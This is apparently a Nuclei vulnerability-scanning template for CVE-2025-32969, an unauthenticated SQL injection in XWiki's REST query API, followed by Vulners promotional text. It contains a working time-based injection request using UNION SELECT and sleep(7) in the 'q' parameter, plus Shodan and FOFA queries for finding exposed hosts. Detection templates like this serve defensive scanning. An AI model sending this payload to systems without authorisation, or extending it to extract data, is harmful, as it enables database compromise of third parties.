id: CVE-2025-32969
info:
name: XWiki REST API Query - SQL Injection
author: ritikchaddha
severity: critical
description: |
A SQL injection vulnerability exists in XWiki's REST API query endpoint. An unauthenticated attacker can execute arbitrary SQL queries through the 'q' parameter by manipulating the HQL query, potentially leading to data exfiltration or system compromise.
impact: |
Unauthenticated attackers can execute arbitrary SQL queries through the REST API query endpoint, potentially leading to complete database compromise and data exfiltration.
remediation: |
Upgrade to the latest XWiki version that properly sanitizes HQL query parameters in the REST API.
reference:
- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-f69v-xrj8-rhxf
- https://nvd.nist.gov/vuln/detail/CVE-2025-32969
classification:
cve-id: CVE-2025-32969
epss-score: 0.79487
epss-percentile: 0.99557
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-89
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: xwiki
product: xwiki
shodan-query: html:"data-xwiki-reference"
fofa-query: body="data-xwiki-reference"
tags: cve,cve2025,xwiki,sqli,rest-api,vkev,vuln
http:
- raw:
- |
@timeout: 20s
GET /rest/wikis/xwiki/query?q=where%20doc.name=length(%27a%27)*org.apache.logging.log4j.util.Chars.SPACE%20or%201%3C%3E%271%5C%27%27%20union%20select%201,2,3,sleep(7)%20%23%27&type=hql&distinct=0 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=7'
- 'status_code==200'
- 'contains_all(body, "WikiManager", "<?xml")'
- 'contains(content_type, "text/javascript")'
condition: and
# digest: 4a0a004730450221008c76bcd0b11d7719304e5943a1ea13c786450974cfd4b92584998d7a4db89096022037aa5359277625ac88d56a0875f544ef7c584d8155a330c6843c0d1ede4eca9f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation